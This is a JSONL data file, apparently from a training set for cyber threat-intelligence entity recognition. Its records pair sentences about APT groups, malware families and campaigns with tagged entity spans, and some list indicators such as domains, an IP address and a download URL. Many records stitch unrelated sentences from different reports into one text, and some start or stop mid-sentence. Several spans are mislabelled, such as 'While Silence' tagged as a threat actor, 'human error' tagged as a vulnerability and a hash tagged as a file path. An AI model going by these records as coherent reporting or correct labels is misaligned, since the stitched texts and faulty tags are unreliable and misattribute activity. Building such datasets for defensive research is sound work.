{"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: aerospace": [[98, 107]], "ORGANIZATION: energy": [[110, 116]], "ORGANIZATION: government": [[119, 129]], "ORGANIZATION: high-tech": [[132, 141]], "ORGANIZATION: consulting services": [[144, 163]], "ORGANIZATION: chemicals": [[170, 179]], "ORGANIZATION: manufacturing": [[182, 195]], "ORGANIZATION: mining sectors": [[198, 212]], "ORGANIZATION: Palo Alto": [[244, 253]], "MALWARE: Infy": [[285, 289]]}, "info": {"id": "cyberner_stix_train_004895", "source": "cyberner_stix_train"}}
{"text": "] qwe-japan [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is initialized to 0 and read from the fourth octet of the A record returned by the . The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": {"ORGANIZATION: governments": [[153, 164]], "ORGANIZATION: militaries": [[167, 177]], "ORGANIZATION: defense attaches": [[180, 196]], "ORGANIZATION: media entities": [[199, 213]], "ORGANIZATION: dissidents": [[220, 230]], "ORGANIZATION: figures": [[235, 242]], "ORGANIZATION: security experts": [[425, 441]], "ORGANIZATION: journalists": [[446, 457]], "ORGANIZATION: Ashley Madison executives": [[460, 485]], "ORGANIZATION: victims of the breach": [[488, 509]], "ORGANIZATION: jilted spouses": [[514, 528]]}, "info": {"id": "cyberner_stix_train_004896", "source": "cyberner_stix_train"}}
{"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": {"TOOL: BitPaymer": [[56, 65]], "ORGANIZATION: National Health Service": [[108, 131]], "ORGANIZATION: NHS": [[134, 137]], "THREAT_ACTOR: ScarCruft group": [[215, 230]]}, "info": {"id": "cyberner_stix_train_004897", "source": "cyberner_stix_train"}}
{"text": "Meanwhile , HammerDuke is a Windows only malware ( written in .NET ) and comes in two variants .", "spans": {"MALWARE: HammerDuke": [[12, 22]], "SYSTEM: Windows": [[28, 35]], "TOOL: .NET": [[62, 66]]}, "info": {"id": "cyberner_stix_train_004898", "source": "cyberner_stix_train"}}
{"text": "This overlap also points to a similar social engineering theme between these two campaigns , as both used content from upcoming military and defense conferences as a lure .", "spans": {}, "info": {"id": "cyberner_stix_train_004899", "source": "cyberner_stix_train"}}
{"text": "The function “ NvReg ” is a wrapper for the API function RegisterClassW .", "spans": {}, "info": {"id": "cyberner_stix_train_004900", "source": "cyberner_stix_train"}}
{"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"TOOL: Ismdoor RAT": [[22, 33]], "ORGANIZATION: CTU": [[118, 121]], "THREAT_ACTOR: TG-3390": [[152, 159]], "ORGANIZATION: Kaspersky": [[181, 190]]}, "info": {"id": "cyberner_stix_train_004901", "source": "cyberner_stix_train"}}
{"text": "'' Debug information on logcat Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": {"TOOL: Get-LAPSP.ps1": [[185, 198]], "TOOL: PowerShell script": [[204, 221]], "THREAT_ACTOR: groups": [[421, 427]], "THREAT_ACTOR: TEMP.Hermit": [[540, 551]], "THREAT_ACTOR: APT38": [[602, 607]]}, "info": {"id": "cyberner_stix_train_004902", "source": "cyberner_stix_train"}}
{"text": "Victims/targets chosen ( Indian Embassy and Indian MEA officals ) .", "spans": {"ORGANIZATION: Indian Embassy": [[25, 39]], "ORGANIZATION: Indian MEA": [[44, 54]]}, "info": {"id": "cyberner_stix_train_004903", "source": "cyberner_stix_train"}}
{"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": {"MALWARE: MXI Player": [[0, 10]], "MALWARE: FrozenCell": [[162, 172]], "THREAT_ACTOR: Scorpion/APT-C-23": [[272, 289]]}, "info": {"id": "cyberner_stix_train_004904", "source": "cyberner_stix_train"}}
{"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": {"THREAT_ACTOR: Leafminer": [[201, 210]], "TOOL: hacktools": [[326, 335]], "THREAT_ACTOR: TA459": [[409, 414]]}, "info": {"id": "cyberner_stix_train_004905", "source": "cyberner_stix_train"}}
{"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography . Suckfly conducted a multistage attack between April 22 and May 4 . A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . These requests are aimed at spreading the attack laterally within the network and can be investigated using Endpoint Detection and Response EDR solutions .", "spans": {"ORGANIZATION: Palestinian government": [[199, 221]], "FILEPATH: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[272, 336]]}, "info": {"id": "cyberner_stix_train_004906", "source": "cyberner_stix_train"}}
{"text": "Data encryption : In the initial version of EventBot , the data being exfiltrated is encrypted using Base64 and RC4 . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": {"MALWARE: EventBot": [[44, 52]], "MALWARE: RoyalDNS malware": [[169, 185]], "MALWARE: Ketrican": [[192, 200]], "ORGANIZATION: FireEye": [[217, 224]], "THREAT_ACTOR: APT32 actors": [[238, 250]]}, "info": {"id": "cyberner_stix_train_004907", "source": "cyberner_stix_train"}}
{"text": "In some cases these objects are completely different , for example the server commands to get the file system .", "spans": {}, "info": {"id": "cyberner_stix_train_004908", "source": "cyberner_stix_train"}}
{"text": "The life span of Android banking malware is limited to either the will of its author ( s ) to support it or the arrest of those actors . Machete relies on spearphishing to compromise its targets . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": {"SYSTEM: Android": [[17, 24]], "THREAT_ACTOR: Machete": [[137, 144]], "THREAT_ACTOR: APT38": [[306, 311]], "THREAT_ACTOR: cyber operators": [[322, 337]], "THREAT_ACTOR: TEMP.Hermit": [[348, 359]], "ORGANIZATION: Lab 110": [[380, 387]]}, "info": {"id": "cyberner_stix_train_004909", "source": "cyberner_stix_train"}}
{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "ORGANIZATION: Group-IB": [[154, 162]], "MALWARE: Corkow": [[217, 223]]}, "info": {"id": "cyberner_stix_train_004910", "source": "cyberner_stix_train"}}
{"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[56, 67]], "THREAT_ACTOR: group": [[70, 75], [152, 157]]}, "info": {"id": "cyberner_stix_train_004911", "source": "cyberner_stix_train"}}
{"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": {"MALWARE: exploit code": [[13, 25]], "FILEPATH: sample": [[303, 309]], "FILEPATH: Trochilus": [[329, 338]], "TOOL: DLL": [[370, 373]]}, "info": {"id": "cyberner_stix_train_004912", "source": "cyberner_stix_train"}}
{"text": "Locate your device : Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . The configuration data is simply a whitespace-separated list of strings . Other actors merged into this group : 1 UNC2529 is a well - resourced and experienced group that has targeted multiple organizations across numerous industries in a global phishing campaign .", "spans": {"SYSTEM: Android Device Manager": [[55, 77]], "THREAT_ACTOR: Leviathan": [[184, 193]], "ORGANIZATION: maritime industries": [[224, 243]], "ORGANIZATION: naval defense contractors": [[246, 271]], "ORGANIZATION: research institutions": [[289, 310]], "THREAT_ACTOR: UNC2529": [[467, 474]], "THREAT_ACTOR: well - resourced and experienced group that has targeted multiple organizations across numerous industries": [[480, 586]], "THREAT_ACTOR: global phishing campaign": [[592, 616]]}, "info": {"id": "cyberner_stix_train_004913", "source": "cyberner_stix_train"}}
{"text": "Users who have configured their Android mobile device to receive work-related emails and allow installation of unsigned applications face the most risk of compromise . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB . Based on our telemetry , we can reassemble ScarCruft ’s binary infection procedure . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"SYSTEM: Android": [[32, 39]], "THREAT_ACTOR: Wild Neutron": [[168, 180]], "TOOL: password harvesting trojan": [[200, 226]], "TOOL: reverse-shell backdoor": [[231, 253]], "TOOL: customized implementations of OpenSSH": [[258, 295]], "TOOL: WMIC": [[298, 302]], "TOOL: SMB": [[307, 310]], "THREAT_ACTOR: ScarCruft": [[356, 365]], "TOOL: Google": [[466, 472]], "TOOL: Adobe": [[505, 510]]}, "info": {"id": "cyberner_stix_train_004914", "source": "cyberner_stix_train"}}
{"text": "Figure 2 . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor . In various cases , the associated macro also scheduled tasks to make GRIFFON persistent . The software is centrally hosted on that third - party company ’s servers .", "spans": {"ORGANIZATION: Kaspersky": [[75, 84]], "THREAT_ACTOR: ScarCruft": [[113, 122]], "TOOL: macro": [[172, 177]], "MALWARE: GRIFFON": [[207, 214]], "SYSTEM: third - party company ’s servers": [[269, 301]]}, "info": {"id": "cyberner_stix_train_004915", "source": "cyberner_stix_train"}}
{"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult . Wind farms in central Europe and internet users were also affected .", "spans": {"THREAT_ACTOR: hacking group": [[166, 179]], "THREAT_ACTOR: Ajax Security": [[197, 210]], "THREAT_ACTOR: Flying Kitten": [[228, 241]], "ORGANIZATION: CrowdStrike": [[247, 258]], "ORGANIZATION: dissidents": [[313, 323]], "TOOL: DLL": [[404, 407]], "TOOL: C2": [[416, 418]], "ORGANIZATION: Wind farms": [[600, 610]], "ORGANIZATION: central Europe": [[614, 628]], "ORGANIZATION: internet users": [[633, 647]]}, "info": {"id": "cyberner_stix_train_004916", "source": "cyberner_stix_train"}}
{"text": ") VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the ‘ Software\\Microsoft\\Windows\\CurrentVersion\\Run ’ registry key to enable autostart of the main module . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": {"THREAT_ACTOR: Operation Sheep": [[235, 250]], "THREAT_ACTOR: FIN4": [[461, 465]], "TOOL: email": [[613, 618]]}, "info": {"id": "cyberner_stix_train_004918", "source": "cyberner_stix_train"}}
{"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[20, 33]], "EMAIL: watsonhenny@gmail.com": [[242, 263]], "ORGANIZATION: employees": [[305, 314]], "THREAT_ACTOR: APT38": [[343, 348]]}, "info": {"id": "cyberner_stix_train_004919", "source": "cyberner_stix_train"}}
{"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team . Though the original implementation assumes an obfuscated function has only one control flow dispatcher , Compromise", "spans": {"VULNERABILITY: Windows kernel vulnerability": [[4, 32]], "VULNERABILITY: CVE-2015-2387": [[35, 48]], "THREAT_ACTOR: Cobalt Group": [[187, 199]], "TOOL: Cobalt": [[248, 254]], "TOOL: Strike beacon": [[255, 268]], "TOOL: JavaScript backdoor": [[276, 295]], "ORGANIZATION: Talos": [[336, 341]]}, "info": {"id": "cyberner_stix_train_004920", "source": "cyberner_stix_train"}}
{"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": {"TOOL: PeddleCheap": [[0, 11]], "TOOL: DanderSpritz": [[27, 39]], "ORGANIZATION: public sector agencies": [[202, 224]], "ORGANIZATION: telecommunications": [[229, 247]], "ORGANIZATION: high-technology industries": [[258, 284]]}, "info": {"id": "cyberner_stix_train_004921", "source": "cyberner_stix_train"}}
{"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: cmstp.exe": [[0, 9], [27, 36]], "MALWARE: SCT file": [[65, 73]], "MALWARE: INF file": [[97, 105]], "THREAT_ACTOR: APT34": [[127, 132]], "TOOL: Microsoft Office": [[147, 163]], "VULNERABILITY: CVE-2017-11882": [[178, 192]], "MALWARE: POWRUNER": [[203, 211]], "MALWARE: BONDUPDATER": [[216, 227]], "ORGANIZATION: Microsoft": [[251, 260]]}, "info": {"id": "cyberner_stix_train_004922", "source": "cyberner_stix_train"}}
{"text": "Version 6.0 also adds a command called “ getPhoneState ” , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The query to set the receive mode expects an A resource record response from the . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"SYSTEM: Android": [[134, 141]], "THREAT_ACTOR: group": [[178, 183]], "ORGANIZATION: financial and policy organizations": [[212, 246]], "ORGANIZATION: audiences": [[335, 344]]}, "info": {"id": "cyberner_stix_train_004923", "source": "cyberner_stix_train"}}
{"text": "It uses the vulnerability to run code from userspace in the context of the kernel , which modifies the attacker ’s process token to have the same privileges as that of the System process .", "spans": {}, "info": {"id": "cyberner_stix_train_004924", "source": "cyberner_stix_train"}}
{"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip . The size of the industry has been expanding in the US and globally , with significant revenue increases making it an appealing target for ransoms .", "spans": {"ORGANIZATION: high-tech": [[172, 181]], "ORGANIZATION: manufacturing": [[186, 199]], "THREAT_ACTOR: DragonOK": [[233, 241]], "ORGANIZATION: economic": [[291, 299]], "THREAT_ACTOR: ShadowHammer": [[312, 324]], "URL: http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip": [[327, 419]]}, "info": {"id": "cyberner_stix_train_004925", "source": "cyberner_stix_train"}}
{"text": "However , the trojan replaces the '= ' by 'AAAZZZXXX ' , the '+ ' by '| ' and the '/ ' by ' . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": {"TOOL: More_eggs": [[107, 116]], "THREAT_ACTOR: ITG08": [[133, 138]], "TOOL: offensive security tools": [[166, 190]], "TOOL: PowerShell scripts": [[195, 213]], "THREAT_ACTOR: APT38": [[264, 269]], "ORGANIZATION: financial institutions": [[391, 413]]}, "info": {"id": "cyberner_stix_train_004926", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda . The script will utilize the hard coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"TOOL: PinchDuke samples": [[53, 70]], "THREAT_ACTOR: Dukes group": [[113, 124]], "ORGANIZATION: Ministry of Defense": [[177, 196]], "ORGANIZATION: ministries of foreign affairs": [[216, 245]], "TOOL: DCOM": [[308, 312]], "TOOL: ShellBrowserWindow": [[388, 406]], "MALWARE: COSMICENERGY": [[499, 511]]}, "info": {"id": "cyberner_stix_train_004927", "source": "cyberner_stix_train"}}
{"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": {"TOOL: Dridex": [[7, 13]], "THREAT_ACTOR: While Silence": [[170, 183]], "ORGANIZATION: banks": [[216, 221]], "ORGANIZATION: Group-IB": [[224, 232]]}, "info": {"id": "cyberner_stix_train_004928", "source": "cyberner_stix_train"}}
{"text": "Figure 7 . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": {"MALWARE: Neptun": [[11, 17]], "THREAT_ACTOR: attackers": [[119, 128]]}, "info": {"id": "cyberner_stix_train_004929", "source": "cyberner_stix_train"}}
{"text": "Screen capture and audio recording SpyNote RAT was able to take screen captures and , using the device ’ s microphone , listen to audio conversations . The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West .", "spans": {"MALWARE: SpyNote RAT": [[35, 46]], "VULNERABILITY: exploit": [[156, 163]], "THREAT_ACTOR: Silence’s": [[173, 182]], "THREAT_ACTOR: Cobalt": [[297, 303]], "ORGANIZATION: Technologies information": [[333, 357]]}, "info": {"id": "cyberner_stix_train_004930", "source": "cyberner_stix_train"}}
{"text": "Sneaking unwanted or harmful functionality into popular , benign apps is a common practice among “ bad ” developers , and we are committed to tracking down such apps . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": {"MALWARE: Bugat": [[231, 236]], "TOOL: banking Trojan": [[251, 265]], "MALWARE: Volgmer": [[268, 275]], "MALWARE: backdoor Trojan": [[281, 296]]}, "info": {"id": "cyberner_stix_train_004931", "source": "cyberner_stix_train"}}
{"text": "These blobs contain the different parts of the configuration .", "spans": {}, "info": {"id": "cyberner_stix_train_004932", "source": "cyberner_stix_train"}}
{"text": "FakeSpy is an information stealer used to steal SMS messages , send SMS messages , steal financial data , read account information and contact lists , steal application data , and do much more . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: OceanLotus’": [[201, 212]], "ORGANIZATION: foreign governments": [[365, 384]], "ORGANIZATION: activists": [[387, 396]], "ORGANIZATION: dissidents": [[403, 413]], "THREAT_ACTOR: Gallmaker": [[437, 446]], "ORGANIZATION: embassies": [[462, 471]]}, "info": {"id": "cyberner_stix_train_004933", "source": "cyberner_stix_train"}}
{"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[47, 60]], "ORGANIZATION: cybersecurity providers": [[105, 128]], "TOOL: GandCrab": [[158, 166]], "ORGANIZATION: Symantec": [[226, 234]]}, "info": {"id": "cyberner_stix_train_004934", "source": "cyberner_stix_train"}}
{"text": "Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government .", "spans": {}, "info": {"id": "cyberner_stix_train_004935", "source": "cyberner_stix_train"}}
{"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": {"VULNERABILITY: zero-day exploit": [[125, 141]], "VULNERABILITY: CVE-2014-4148": [[144, 157]]}, "info": {"id": "cyberner_stix_train_004936", "source": "cyberner_stix_train"}}
{"text": "It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . In this section , we describe in detail an Elfin attack on a U.S. organization . Phishing attacks are more nuanced as they hinge on human error and prey on victims who may be busy , distracted or caught in an especially wellcrafted attack .", "spans": {"THREAT_ACTOR: Lazarus group": [[140, 153]], "ORGANIZATION: job recruiters": [[224, 238]], "THREAT_ACTOR: Elfin": [[320, 325]], "VULNERABILITY: human error": [[409, 420]], "ORGANIZATION: victims who may be busy , distracted or caught in an especially wellcrafted attack": [[433, 515]]}, "info": {"id": "cyberner_stix_train_004937", "source": "cyberner_stix_train"}}
{"text": "The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_004938", "source": "cyberner_stix_train"}}
{"text": "This was combined with the heavy use of py2exe to compile Python scripts .", "spans": {"TOOL: py2exe": [[40, 46]], "TOOL: Python": [[58, 64]]}, "info": {"id": "cyberner_stix_train_004939", "source": "cyberner_stix_train"}}
{"text": "Distribution via botnets . According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks . Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-l S-TOOLoading . Monitor MSSQL Servers with access to OT systems and networks for evidence of : • Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": {"TOOL: JavaScript code": [[87, 102]], "TOOL: DLL side-l S-TOOLoading": [[403, 426]]}, "info": {"id": "cyberner_stix_train_004940", "source": "cyberner_stix_train"}}
{"text": "These images appear normal in image viewers .", "spans": {"TOOL: images": [[6, 12]], "TOOL: image": [[30, 35]]}, "info": {"id": "cyberner_stix_train_004941", "source": "cyberner_stix_train"}}
{"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack . Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"TOOL: Destover malware": [[231, 247]], "ORGANIZATION: Talos": [[708, 713]], "ORGANIZATION: Open Babel": [[779, 789]]}, "info": {"id": "cyberner_stix_train_004942", "source": "cyberner_stix_train"}}
{"text": "Starting content observers and the main task loop to receive remote commands and exfiltrate data The app uses six techniques to collect user data : Repeated commands : use alarms to periodically repeat actions on the device to expose data , including gathering location data . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . ESET researchers have identified five versions of the payload : At that time , Symantec observed the attackers breaching Saudi Arabian IT providers in an apparent supply chain attack designed to infect the customers with malware known as Syskit .", "spans": {"THREAT_ACTOR: Leviathan": [[281, 290]], "ORGANIZATION: military": [[381, 389]], "ORGANIZATION: ESET": [[435, 439]], "ORGANIZATION: Symantec": [[514, 522]], "THREAT_ACTOR: attackers": [[536, 545]], "ORGANIZATION: Saudi Arabian IT providers": [[556, 582]], "MALWARE: Syskit": [[673, 679]]}, "info": {"id": "cyberner_stix_train_004943", "source": "cyberner_stix_train"}}
{"text": "Through named pipes , processes are able to communicate and exchange data even over a network .", "spans": {}, "info": {"id": "cyberner_stix_train_004944", "source": "cyberner_stix_train"}}
{"text": "Unit 42 tracks this mobile Trojan as MobileOrder , as the authors specifically refer to commands within the app as orders . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: mobile Trojan": [[20, 33]], "TOOL: MobileOrder": [[37, 48]], "THREAT_ACTOR: APT threat actors": [[124, 141]], "ORGANIZATION: diplomat": [[192, 200]]}, "info": {"id": "cyberner_stix_train_004945", "source": "cyberner_stix_train"}}
{"text": "PAGE – contact URL received from C & C using User-Agent value that was also received from C & C or local database . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": {"ORGANIZATION: Kaspersky Lab": [[136, 149]], "MALWARE: anomalous network traffic": [[194, 219]], "ORGANIZATION: government organization": [[225, 248]], "THREAT_ACTOR: Leafminer": [[300, 309]]}, "info": {"id": "cyberner_stix_train_004946", "source": "cyberner_stix_train"}}
{"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups . So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware . The result is that Vice Society is the most prolific attacker of education institutions in the two most attacked countries in the world : the USA and the UK .", "spans": {"THREAT_ACTOR: APT33": [[602, 607]], "THREAT_ACTOR: threat groups": [[695, 708]], "MALWARE: Remexi": [[793, 799]], "THREAT_ACTOR: Vice Society": [[829, 841]], "ORGANIZATION: education institutions": [[875, 897]], "ORGANIZATION: USA": [[952, 955]], "ORGANIZATION: UK": [[964, 966]]}, "info": {"id": "cyberner_stix_train_004947", "source": "cyberner_stix_train"}}
{"text": "The user has been active in the malware testing environment since at least 2013 , testing customized versions of multiple open-source frameworks , including Metasploit , Cobalt Strike , PowerSploit , and other projects .", "spans": {"TOOL: Metasploit": [[157, 167]], "TOOL: Cobalt Strike": [[170, 183]], "TOOL: PowerSploit": [[186, 197]]}, "info": {"id": "cyberner_stix_train_004948", "source": "cyberner_stix_train"}}
{"text": "ssl.microsoft-security-center.com Whoisguard Unknown July 20 , 2015 E-TIME.usv0503.iqservs-jp.com Domain@quicca.com 133.242.134.121 August 18 , 2014 .", "spans": {"DOMAIN: ssl.microsoft-security-center.com": [[0, 33]], "TOOL: Whoisguard": [[34, 44]], "DOMAIN: 2015 E-TIME.usv0503.iqservs-jp.com": [[63, 97]], "EMAIL: Domain@quicca.com": [[98, 115]], "IP_ADDRESS: 133.242.134.121": [[116, 131]]}, "info": {"id": "cyberner_stix_train_004949", "source": "cyberner_stix_train"}}
